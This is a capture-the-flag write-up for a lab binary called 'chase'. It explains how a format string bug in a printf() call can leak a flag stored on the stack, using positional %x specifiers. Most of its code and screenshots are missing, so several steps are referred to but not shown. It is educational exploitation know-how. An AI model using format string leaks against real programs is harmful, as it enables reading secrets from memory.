chase

Leaking data off the stack using format strings.

3KB
archive
Open

This is an exciting binary. It has no canary and no PIE, but it has a secure call to fgets() , meaning we still can't truly stack smash. What can we do?

First Observations

We first notice that it does nothing when we try to run the program. We'll notice later that this is because the binary ensures that a file called flag.txt is sitting in the same directory; otherwise, it will stop execution. We can create a dummy file to get around this. I use the same flag every time:

echo flag{temporary_flag} > flag.txt

This loads in flag{temporary_flag} into the flag file. I use this (1) because it's sufficiently long and looks like a flag I might see, and (2) because it has the flag braces so I can easily find it in memory.

With that out of the way, we can now run the binary. It asks for some input and prints it back to us. Let's dive deeper and check for vulnerable code.

Static Analysis

We can use checksec to see what protections are enabled on the binary:

$ checksec chase
[*] '/home/joybuzzer/Documents/vunrotc/public/03-formats/chase/src/chase'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

As expected, there's nothing super shocking here. No canary, PIE disabled, NX enabled. Shellcode is off the table, but buffer overflows aren't yet.

Checking gdb, we make the following observations:

  • The only function that seems to be made by the user is main().

  • main() calls several interesting functions. The most important of these are fopen(), fgets(), puts(), and printf().

  • There is a call to exit(), but we can assume, based on earlier findings, that this is because the binary checks for the flag file's existence.

Let's try and break this code and reassemble what the C code might look like.

Reassembling the Disassembly

Our first significant call is to fopen(). Based on the man pages, we know that fopen() takes two arguments:

  1. The path name of the file to open

  2. The mode to open the file (typically read/write, bytes/chars, etc.)

Using gdb, we can check the arguments:

gdb's GEF will predict the arguments for us:

If we didn't have GEF, we could check the stack:

fopen() returns a FILE*, which is eventually stored on the stack at ebp-0xc. There's a check afterward to make sure that its value is not NULL, but we can ignore that for now.

The next call is to fgets(). We can check the arguments in the same way:

This isn't super helpful to us. We know that fgets() takes three arguments:

  1. The buffer to read into (in this case, 0xf7ffda40)

  2. The number of bytes to read (in this case, 0x64 or 100 bytes)

  3. The file to read from (in this case, 0x0804d1a0)

The first and third ones make little sense until we check the assembly.

The first parameter is the address of ebp-0x70, which is where we are writing. The second argument is clearly 0x64. The third argument is the value at ebp-0xc, which is the FILE* from fopen().

None of the puts() calls are really important to us, so we're going to skip those. Then we reach fgets().

The first argument is the address of ebp-0xd4, which is where we are writing. The second argument is clearly 0x64. The third argument is the value at ebx-0x4.

We see that the third argument is stdin, which makes sense because we've been looking for a function that takes keyboard input.

Last, we see that there is a call to printf(). We can check the arguments in the same way:

We see that the string that we read from is being passed to printf. This is the format string bug because the string is being directly passed into printf.

Based on all this information, we can reassemble the C code (at least the important parts):

Exploitation

We know that the flag is being loaded on the stack. It's our job to use the format string bug to find where it is. Without gdb, this would be a very annoying challenge.

We can use gdb to find the flag. If we put the instruction pointer right before the fgets() call that takes from stdin, we can see what's on the stack when we enter the format strings.

Here's why we use flag{temporary_flag} as the contents of flag.txt. flag in hex is 0x67616c66. We see that it starts at 0xffffd568, which we can verify:

We count that this starts at the 30th word on the stack. We can verify this using the format specifier in our input:

We count that the flag is from words 30 to 36.

Python Processing

Rather than doing this manually, we want to process the data to print out the flag easily. Let's see what this looks like.

The first thing we want to do is build the payload. Rather than typing it manually, we can use format strings to build it for us.

This code cycles from idx=30 to idx=36 (because range doesn't include the last number). It then uses a format string to put the index in the right place (e.g. %30$x). Because format strings aren't supported in byte strings, we have to use .encode() to convert the string to bytes. Then, we append it to our payload.

Next, we send off the payload and receive the data:

Now, we need to process the data. Let's do this one step at a time

  • We know the data is in word-sized chunks, delimited by spaces.

  • The chunks represent four bytes, meaning that for each two-character chunk, we need to convert this to a byte.

  • Each chunk is in little-endian, meaning once we have the bytes, we need to reverse them.

This will print our flag! We can do this entire process in one big step:

Let's think about it:

  • For each item in the split data (i.e. data_arr), it's using binascii.unhexlify to convert the data from a hex to a byte string.

  • From there, we are reversing the data (i.e. [::-1]) and converting it to a string (i.e. .decode()).

  • Finally, we are printing the data without a newline (i.e. end=''). This way, we don't even have to store the data and then worry about using ''.join().

Here is the full exploit:

Last updated

Was this helpful?